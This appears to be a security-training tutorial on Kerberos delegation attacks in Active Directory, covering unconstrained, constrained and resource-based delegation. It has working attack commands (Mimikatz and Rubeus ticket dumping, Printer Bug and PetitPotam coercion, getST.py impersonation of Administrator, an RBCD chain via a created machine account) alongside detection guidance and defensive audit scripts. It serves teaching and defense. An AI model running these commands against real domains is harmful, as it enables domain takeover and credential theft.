Delegation Attacks

Advanced · 45 min · Writeup

Exploiting Kerberos delegation for privilege escalation

Learning Objectives

  • Understand delegation types
  • Exploit unconstrained delegation
  • Abuse constrained delegation
  • Exploit resource-based delegation

Kerberos Delegation allows services to impersonate users and access other services on their behalf. Sounds convenient, right? It is - until attackers abuse it. Delegation misconfigurations are among the most devastating AD weaknesses.

Think of delegation like giving a butler permission to use your credit card. Unconstrained delegation is saying "use it anywhere." Constrained delegation is "only use it at the grocery store." Both can be abused if the butler (or anyone who compromises them) is malicious.

Three Types of Delegation

Windows has three delegation types: Unconstrained (most dangerous), Constrained (still risky), and Resource-Based Constrained (newest, also exploitable). We'll cover all three.

Unconstrained Delegation

```
Unconstrained Delegation:
├── Machine can impersonate ANY user to ANY service
├── TGT is cached in memory when user authenticates
├── Attacker with access to machine can steal TGTs
└── Enabled via: "Trust this computer for delegation to any service"

How it works:
1. User authenticates to service on Server A
2. User's TGT is sent to Server A (for delegation)
3. Server A caches TGT in memory
4. Server A can now impersonate user ANYWHERE
5. Attacker dumps cached TGTs → impersonates users

Attack scenario:
1. Compromise machine with unconstrained delegation
2. Wait for or coerce privileged user to authenticate
3. Extract their TGT from memory
4. Pass-the-Ticket as that user
```

Finding Unconstrained Delegation

```powershell
# PowerView
Get-DomainComputer -Unconstrained

# AD Module
Get-ADComputer -Filter {TrustedForDelegation -eq $True}
Get-ADUser -Filter {TrustedForDelegation -eq $True}

# LDAP query
(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))

# Note: DCs always have unconstrained delegation by design
```
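As an added illustration (not code from the original page), the following Python audit applies the same userAccountControl bit the LDAP filter above tests, and extends the check to the other delegation-relevant bits: TRUSTED_TO_AUTH_FOR_DELEGATION (protocol transition), SERVER_TRUST_ACCOUNT (the DC exemption noted in the comment) and NOT_DELEGATED, the bit set by "Account is sensitive and cannot be delegated". The directory entries and their `privileged` marker are constructed sample data.

```python
# Added audit example (not from the original page). Flag values are the documented
# userAccountControl bits; the entries below are constructed sample data.
TRUSTED_FOR_DELEGATION = 0x80000            # 524288 in the LDAP filter above: unconstrained
NOT_DELEGATED = 0x100000                    # "Account is sensitive and cannot be delegated"
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition
SERVER_TRUST_ACCOUNT = 0x2000               # domain controller computer account

SAMPLE_ENTRIES = [  # constructed: name, userAccountControl, is this a Tier-0 principal?
    {"name": "DC01$",         "uac": 0x82000,   "privileged": False},  # DC: unconstrained by design
    {"name": "WEB01$",        "uac": 0x81000,   "privileged": False},  # member server, unconstrained
    {"name": "svc_sql",       "uac": 0x1010200, "privileged": False},  # user with protocol transition
    {"name": "Administrator", "uac": 0x10200,   "privileged": True},   # not protected from delegation
    {"name": "da_backup",     "uac": 0x110200,  "privileged": True},   # NOT_DELEGATED already set
]

def ldap_bit_and(value, mask):
    """Semantics of the 1.2.840.113556.1.4.803 matching rule: every bit in mask is set."""
    return value & mask == mask

def classify(entry):
    """Return a list of human-readable findings for one directory entry."""
    uac = entry["uac"]
    findings = []
    if ldap_bit_and(uac, TRUSTED_FOR_DELEGATION) and not ldap_bit_and(uac, SERVER_TRUST_ACCOUNT):
        findings.append("unconstrained delegation on a non-DC host")
    if ldap_bit_and(uac, TRUSTED_TO_AUTH_FOR_DELEGATION):
        findings.append("protocol transition enabled: S4U2Self works for any user")
    if entry["privileged"] and not ldap_bit_and(uac, NOT_DELEGATED):
        findings.append("privileged principal is delegatable (set NOT_DELEGATED)")
    return findings

def audit(entries):
    """Map each entry name to its findings, omitting entries with nothing to report."""
    report = {}
    for entry in entries:
        findings = classify(entry)
        if findings:
            report[entry["name"]] = findings
    return report

if __name__ == "__main__":
    for name, findings in audit(SAMPLE_ENTRIES).items():
        print(name, "->", "; ".join(findings))
```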

Extracting Cached TGTs

```
# Mimikatz - export all tickets
privilege::debug
sekurlsa::tickets /export

# Look for TGTs (krbtgt in service name)
# [0;12345]-0-0-40e10000-admin@krbtgt-CORP.LOCAL.kirbi

# Rubeus
.\Rubeus.exe dump

# Monitor for new tickets (wait for privileged user)
.\Rubeus.exe monitor /interval:5
```

Coercing Authentication (Printer Bug)

```bash
# Force DC to authenticate to your compromised machine
# Using SpoolSample (Printer Bug)
SpoolSample.exe dc.corp.local compromised-server.corp.local

# Using Petitpotam
python3 Petitpotam.py compromised-server dc.corp.local

# Using Coercer (multiple methods)
python3 Coercer.py -t dc.corp.local -l compromised-server

# Now the DC's machine account TGT is in your machine's memory!
# Extract with Mimikatz and DCSync
```

DC Compromise via Printer Bug

If you compromise a server with unconstrained delegation, use the Printer Bug to make the DC authenticate to you. You get the DC's machine account TGT → S4U2Self to impersonate DA → DCSync.

Constrained Delegation

```
Constrained Delegation:
├── Service can impersonate users to SPECIFIC services only
├── Uses S4U2Proxy extension
├── Services listed in msDS-AllowedToDelegateTo
└── Still dangerous - can often escalate

How it works:
1. Service A configured to delegate to Service B
2. User authenticates to Service A
3. Service A requests service ticket for user to Service B
4. Service A accesses Service B as user

Attack potential:
- If you control Service A, you can impersonate ANY user to Service B
- Service B might be valuable (CIFS on DC, HTTP on server, etc.)
```

Finding Constrained Delegation

```powershell
# PowerView
Get-DomainComputer -TrustedToAuth | Select-Object name, msds-allowedtodelegateto
Get-DomainUser -TrustedToAuth | Select-Object name, msds-allowedtodelegateto

# AD Module
Get-ADComputer -Filter {msDS-AllowedToDelegateTo -like '*'} -Properties msDS-AllowedToDelegateTo
Get-ADUser -Filter {msDS-AllowedToDelegateTo -like '*'} -Properties msDS-AllowedToDelegateTo

# Look for valuable targets:
# cifs/dc.corp.local - File shares on DC
# http/server.corp.local - Web services
# ldap/dc.corp.local - LDAP operations
```

Exploiting Constrained Delegation

```bash
# Scenario: svc_sql can delegate to cifs/dc.corp.local
# You have svc_sql's password or hash

# Impacket - getST.py
# Request service ticket as Administrator to CIFS on DC
getST.py -spn cifs/dc.corp.local -impersonate Administrator corp.local/svc_sql:password
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass corp.local/Administrator@dc.corp.local

# With hash
getST.py -spn cifs/dc.corp.local -impersonate Administrator -hashes :HASH corp.local/svc_sql

# Rubeus
.\Rubeus.exe s4u /user:svc_sql /rc4:HASH /impersonateuser:Administrator \
    /msdsspn:cifs/dc.corp.local /ptt
```

SPN Alteration

You can often modify the SPN in the ticket. If delegation is to cifs/server, try changing it to ldap/server or http/server: the service name sits in the unencrypted part of the ticket, so this works whenever the receiving service does not validate the SPN.

Resource-Based Constrained Delegation (RBCD)

```
RBCD (Resource-Based Constrained Delegation):
├── Target service decides who can delegate TO it
├── Configured on the TARGET, not source
├── Uses msDS-AllowedToActOnBehalfOfOtherIdentity
├── Can be set by anyone with write access to computer object
└── Often exploitable via computer account creation

Key difference:
- Traditional: "Service A can delegate to Service B" (set on A)
- RBCD: "Service B allows delegation FROM Service A" (set on B)

Attack scenario:
1. You have write access to a computer account
2. Create new computer account (or use existing controlled)
3. Set RBCD allowing your computer to delegate to target
4. Use S4U2Self + S4U2Proxy to impersonate any user to target
```

RBCD Attack Prerequisites

```
You need:
├── Write access to target computer's AD object
│   ├── GenericAll
│   ├── GenericWrite
│   ├── WriteProperty on specific attribute
│   └── Owns the object
└── A computer account you control
    ├── Machine you've compromised
    ├── OR create new computer (ms-DS-MachineAccountQuota)
    └── Default: Any user can create 10 machine accounts
```

Exploiting RBCD

```powershell
# Step 1: Create machine account (if needed)
# Impacket addcomputer
addcomputer.py -computer-name 'EVIL$' -computer-pass 'EvilPass123!' corp.local/user:password

# Or PowerMad
Import-Module .\Powermad.ps1
New-MachineAccount -MachineAccount EVIL -Password $(ConvertTo-SecureString 'EvilPass123!' -AsPlainText -Force)

# Step 2: Get SID of your computer
$sid = Get-DomainComputer EVIL -Properties objectsid | Select-Object -ExpandProperty objectsid

# Step 3: Create security descriptor
$SD = New-Object Security.AccessControl.RawSecurityDescriptor("O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$sid)")
$bytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($bytes, 0)

# Step 4: Set RBCD on target
Set-DomainObject -Identity 'TARGET$' -Set @{'msDS-AllowedToActOnBehalfOfOtherIdentity'=$bytes}
```

```bash
# Step 5: Get service ticket via RBCD
# S4U2Self (get ticket to yourself as target user)
# S4U2Proxy (use that to get ticket to target service)

getST.py -spn cifs/target.corp.local -impersonate Administrator \
    -dc-ip dc.corp.local corp.local/EVIL$:'EvilPass123!'

export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass corp.local/Administrator@target.corp.local
```

Delegation Comparison

Type           Scope             Configured On   Attack Method
Unconstrained  Any service       Source          Extract cached TGTs
Constrained    Specific SPNs     Source          S4U to target SPNs
RBCD           Specific targets  Target          Set RBCD + S4U

Detection & Defense

```
Detection:
├── Unconstrained Delegation
│   ├── Event ID 4769 - Service ticket request
│   ├── Look for TGT forwarding patterns
│   └── Monitor for SpoolSample/Petitpotam traffic
├── Constrained Delegation
│   ├── S4U2Proxy operations
│   └── Unusual service ticket patterns
└── RBCD
    ├── Changes to msDS-AllowedToActOnBehalfOfOtherIdentity
    ├── New computer account creation
    └── Event ID 4662 - Object modification

Defense:
├── Minimize delegation usage
├── Use "Account is sensitive and cannot be delegated"
│   └── For privileged accounts (DA, etc.)
├── Protected Users group prevents delegation
├── Limit who can create machine accounts
│   └── Set ms-DS-MachineAccountQuota to 0
├── Audit delegation settings regularly
└── Monitor for delegation attribute changes
```
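For the RBCD branch of the detection tree, here is an added example (not code from the page) that inspects a newly written msDS-AllowedToActOnBehalfOfOtherIdentity value in the SDDL form the PowerShell step above builds, and raises an alert for every trustee SID that is not on a documented allowlist for that target. The allowlist, target names and SDDL strings are constructed sample data; obtaining the new value from a directory-change audit event is assumed.

```python
import re

# Added detection example (not from the original page). The allowlist and the
# SDDL values below are constructed sample data.
ACE_RE = re.compile(
    r"\((?P<type>[A-Z]*);(?P<flags>[A-Z]*);(?P<rights>[A-Z]*);"
    r"(?P<obj>[^;]*);(?P<inh>[^;]*);(?P<sid>[^)]+)\)"
)

# Constructed allowlist: target computer -> SIDs documented as allowed to delegate to it
APPROVED_RBCD = {
    "FILESRV01$": {"S-1-5-21-1111-2222-3333-1200"},  # e.g. an approved web front-end account
}

def parse_dacl_aces(sddl):
    """Return (ace_type, rights, trustee_sid) for each ACE in the DACL of an SDDL string."""
    match = re.search(r"D:[A-Z]*((?:\([^)]*\))*)", sddl)  # 'D:' + optional DACL flags + ACEs
    if not match:
        return []
    return [(m["type"], m["rights"], m["sid"]) for m in ACE_RE.finditer(match.group(1))]

def check_rbcd_change(target, new_sddl, approved=APPROVED_RBCD):
    """Alert on every access-allowed ACE whose trustee is not approved for target."""
    alerts = []
    for ace_type, rights, sid in parse_dacl_aces(new_sddl):
        if ace_type != "A":  # only access-allowed ACEs grant the right to act on behalf of others
            continue
        if sid not in approved.get(target, set()):
            alerts.append(f"{target}: RBCD granted to unapproved trustee {sid} (rights {rights})")
    return alerts

# Constructed samples: a value from a documented change, then one that adds an unknown SID
LEGIT = "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1111-2222-3333-1200)"
SUSPICIOUS = ("O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1111-2222-3333-1200)"
              "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1111-2222-3333-4105)")

if __name__ == "__main__":
    for label, value in (("legit", LEGIT), ("suspicious", SUSPICIOUS)):
        print(label, check_rbcd_change("FILESRV01$", value))
```

A second ACE on a target that normally has one trustee, or any trustee outside the allowlist, is the condition to alert on; deny ACEs are ignored because they do not grant delegation.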

Protected Users

Members of the Protected Users group cannot be delegated. Add Domain Admins and other privileged accounts to this group to prevent delegation-based attacks.

Delegation Attack Methodology

Delegation Attack Flow

1. Enumerate: Find delegation configurations
2. Identify Type: Unconstrained, Constrained, or RBCD potential
3. Compromise: Get access to delegating account/machine
4. Execute: Extract TGT or perform S4U attack
5. Impersonate: Use obtained ticket to access target
6. Escalate: Typically leads to DA or DC compromise

Knowledge Check

Quick Quiz

What's the main danger of unconstrained delegation?

Challenges

Printer Bug to DCSync

Challenge · advanced

Compromise a machine with unconstrained delegation, use the Printer Bug to coerce DC authentication, capture the TGT, and perform DCSync.


Key Takeaways

  • Unconstrained delegation caches TGTs - steal them all
  • Constrained delegation limits to specific SPNs
  • RBCD is configured on target, exploitable via write access
  • Printer Bug coerces DC authentication
  • Protected Users group prevents delegation
  • Set MachineAccountQuota to 0 to prevent RBCD attacks